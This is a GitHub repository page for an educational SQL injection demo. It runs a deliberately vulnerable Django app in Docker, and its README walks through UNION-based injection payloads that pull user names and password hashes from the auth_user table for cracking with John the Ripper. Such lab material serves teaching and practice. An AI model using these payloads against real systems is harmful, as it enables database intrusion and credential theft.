Skip to content

LogstonEducation/sql-injection-attack-demo

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
orders
orders
 
 
project
project
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
db.sqlite3
db.sqlite3
 
 
manage.py
manage.py
 
 
requirements.txt
requirements.txt
 
 
uwsgi.ini
uwsgi.ini
 
 

Repository files navigation

How to perform a SQL Injection Attack

Build

docker build -t logstoneducation/sql-injection:0.0.1 .

Run

docker run --rm -p 8000:8000 logstoneducation/sql-injection:0.0.1

Exploit

  1. http://127.0.0.1:8000/items/search
  2. Search for a few items (eg. Madison)
  3. Check if the search is vulnerable by searching for blah' UNION SELECT 1'. This cause us to search for "blah" and then UNION that with a SELECT 1 call.
  4. It takes some trial and error before we find out the name of the user table:
  5. Search for z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '
    1. SELECT name FROM orders_item WHERE name LIKE '%z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
  6. Instead of searching for first_name, we can search for password.
    1. SELECT name FROM orders_item WHERE name LIKE '%z' UNION SELECT password FROM auth_user WHERE first_name LIKE '%'

Now we can take these and pass them to a password cracker like JTR.

About

No description, website, or topics provided.

Resources

Readme

License

GPL-3.0 license
Activity
Custom properties

Stars

1 star

Watchers

2 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages